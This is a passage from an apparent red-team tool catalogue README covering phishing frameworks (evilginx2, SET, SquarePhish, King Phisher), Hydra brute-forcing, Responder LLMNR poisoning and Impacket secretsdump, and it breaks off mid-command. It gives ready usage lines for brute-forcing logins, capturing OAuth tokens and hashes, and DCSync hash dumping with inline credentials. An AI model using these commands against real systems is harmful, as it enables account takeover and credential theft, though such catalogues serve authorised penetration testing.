1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eevilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/fin3ss3g0d/evilgophish\"\u003e\u003cpre\u003egit clone https://github.com/fin3ss3g0d/evilgophish\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Usage:\n./setup \u0026lt;root domain\u0026gt; \u0026lt;subdomain(s)\u0026gt; \u0026lt;root domain bool\u0026gt; \u0026lt;redirect url\u0026gt; \u0026lt;feed bool\u0026gt; \u0026lt;rid replacement\u0026gt; \u0026lt;blacklist bool\u0026gt;\n - root domain - the root domain to be used for the campaign\n - subdomains - a space separated list of evilginx2 subdomains, can be one if only one\n - root domain bool - true or false to proxy root domain to evilginx2\n - redirect url - URL to redirect unauthorized Apache requests\n - feed bool - true or false if you plan to use the live feed\n - rid replacement - replace the gophish default 
\u0026quot;rid\u0026quot; in phishing URLs with this value\n - blacklist bool - true or false to use Apache blacklist\nExample:\n ./setup.sh example.com \u0026quot;accounts myaccount\u0026quot; false https://redirect.com/ true user_id false\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eUsage:\n./setup \u0026lt;root domain\u0026gt; \u0026lt;subdomain(s)\u0026gt; \u0026lt;root domain bool\u0026gt; \u0026lt;redirect url\u0026gt; \u0026lt;feed bool\u0026gt; \u0026lt;rid replacement\u0026gt; \u0026lt;blacklist bool\u0026gt;\n - root domain - the root domain to be used for the campaign\n - subdomains - a space separated list of evilginx2 subdomains, can be one if only one\n - root domain bool - true or false to proxy root domain to evilginx2\n - redirect url - URL to redirect unauthorized Apache requests\n - feed bool - true or false if you plan to use the live feed\n - rid replacement - replace the gophish default \"rid\" in phishing URLs with this value\n - blacklist bool - true or false to use Apache blacklist\nExample:\n ./setup.sh example.com \"accounts myaccount\" false https://redirect.com/ true user_id false\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/IO1337/social-engineering-toolkit\"\u003eSocial Engineer Toolkit (SET)\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-social-engineer-toolkit-set\" class=\"anchor\" aria-label=\"Permalink: 
🔙Social Engineer Toolkit (SET)\" href=\"#social-engineer-toolkit-set\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install\"\u003e\u003cpre\u003egit clone https://github.com/IO1337/social-engineering-toolkit\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e python setup.py install\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 setoolkit\"\u003e\u003cpre\u003epython3 
setoolkit\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/vanhauser-thc/thc-hydra\"\u003eHydra\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-hydra\" class=\"anchor\" aria-label=\"Permalink: 🔙Hydra\" href=\"#hydra\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for logon brute force attacks. 
Can brute-force a number of services, including SSH, FTP, TELNET, HTTP, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install hydra\"\u003e\u003cpre\u003esudo apt install hydra\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form \u0026quot;login.php:username-^USER^\u0026amp;password=^PASS^:Error\u0026quot;\nhydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh\"\u003e\u003cpre\u003ehydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003elogin.php:username-^USER^\u0026amp;password=^PASS^:Error\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\nhydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/secureworks/squarephish\"\u003eSquarePhish\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-squarephish\" class=\"anchor\" aria-label=\"Permalink: 🔙SquarePhish\" href=\"#squarephish\"\u003e\u003csvg 
class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See \u003ca href=\"https://github.com/secureworks/PhishInSuits\"\u003ePhishInSuits\u003c/a\u003e for more about OAuth Device Code flow for phishing attacks).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAttack Steps:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eSend malicious QR code to victim\u003c/li\u003e\n\u003cli\u003eVictim scans QR code with mobile device\u003c/li\u003e\n\u003cli\u003eVictim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)\u003c/li\u003e\n\u003cli\u003eVictim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)\u003c/li\u003e\n\u003cli\u003eAttacker polls for authentication\u003c/li\u003e\n\u003cli\u003eVictim enters code into legit Microsoft website\u003c/li\u003e\n\u003cli\u003eAttacker saves authentication token\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone 
https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/secureworks/squarephish\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e squarephish\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eBefore using either module, update the required information in the settings.config file noted with \u003ccode\u003eRequired\u003c/code\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Email Module):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\n -e EMAIL, --email EMAIL\n victim email address to send initial QR code email to\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eusage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\n -e EMAIL, --email EMAIL\n victim email address to send initial QR code email to\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Server Module):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"usage: squish.py server [-h] [-c CONFIG] [--debug]\n\noptional arguments:\n -h, --help show this help message and 
exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eusage: squish.py server [-h] [-c CONFIG] [--debug]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/securestate/king-phisher\"\u003eKing Phisher\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-king-phisher\" class=\"anchor\" aria-label=\"Permalink: 🔙King Phisher\" href=\"#king-phisher\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eKing Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, attackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall (Linux - Client \u0026amp; Server):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh \u0026amp;\u0026amp; \\\nsudo bash ./install.sh\"\u003e\u003cpre\u003ewget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e \\\nsudo bash ./install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eThe installer is a downloaded script executed unverified as root. Read \u003ccode\u003einstall.sh\u003c/code\u003e after downloading it and before handing it to \u003ccode\u003esudo bash\u003c/code\u003e, and prefer installing on a dedicated VM or host used only for the engagement.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce King Phisher has been installed please follow the \u003ca href=\"https://github.com/rsmusllp/king-phisher/wiki/Getting-Started\"\u003ewiki page\u003c/a\u003e to set up SSH, Database config, SMTP server etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png\" alt=\"image\" style=\"max-width: 
100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eExecution\u003c/h1\u003e\u003ca id=\"user-content-execution\" class=\"anchor\" aria-label=\"Permalink: Execution\" href=\"#execution\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/SpiderLabs/Responder\"\u003eResponder\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-responder\" class=\"anchor\" aria-label=\"Permalink: 🔙Responder\" href=\"#responder\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 
.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eResponder is a tool for poisoning the LLMNR and NBT-NS protocols on a network in order to capture credentials, typically NetNTLM challenge-response hashes that can then be cracked offline or relayed to other hosts.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. When DNS cannot resolve a hostname (for example a mistyped share name), the system falls back to these protocols and multicasts or broadcasts a request for the name to the local network.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eResponder listens for these requests and answers them claiming to be the requested host, so the requesting system connects to the attacker and authenticates to it, handing over its credential material.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/SpiderLabs/Responder\ncd Responder\"\u003e\u003cpre\u003egit clone https://github.com/SpiderLabs/Responder\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Responder\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eResponder binds a number of privileged ports (SMB, HTTP, LDAP and others), so run it as root and make sure no other service on the attacking host already holds those ports. Poisoning answers every host on the segment that sends a broadcast, so confirm the whole segment is in scope before starting it.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Running the tool\n./Responder.py [options]\n\n# Typical usage\n./Responder.py -I eth0 -wrf\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Running the tool\u003c/span\u003e\n./Responder.py [options]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Typical 
usage\u003c/span\u003e\n./Responder.py -I eth0 -wrf\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/SpiderLabs/Responder#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\" rel=\"nofollow\"\u003ehttps://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/fortra/impacket/blob/master/examples/secretsdump.py\"\u003esecretsdump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-secretsdump\" class=\"anchor\" aria-label=\"Permalink: 🔙secretsdump\" href=\"#secretsdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 
2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt does this by reading the Security Account Manager (SAM), SECURITY and SYSTEM registry hives (remotely, or from exported copies), by parsing an offline \u003ccode\u003entds.dit\u003c/code\u003e together with its SYSTEM hive, or by asking a Domain Controller to replicate account data (DCSync). The extracted information includes:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003ePassword hashes for local accounts (and for every domain account when dumping NTDS)\u003c/li\u003e\n\u003cli\u003eKerberos keys for domain accounts (keys, not tickets)\u003c/li\u003e\n\u003cli\u003eLSA Secrets\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 -m pip install impacket\"\u003e\u003cpre\u003epython3 -m pip install impacket\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eDCSync only works with an account that holds directory replication rights (Domain Admins by default) and is a well-known detection trigger on the Domain Controller. The example below passes the password on the command line, where it lands in shell history; omit it to be prompted, or use \u003ccode\u003e-hashes\u003c/code\u003e to authenticate with an NT hash instead.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Extract NTLM hashes with local files\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n# DCSync attack and dump the NTLM hashes of all domain users.\nsecretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Extract NTLM hashes with local files\u003c/span\u003e\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e DCSync attack and dump the NTLM hashes of all domain users.\u003c/span\u003e\nsecretsdump.py -dc-ip 
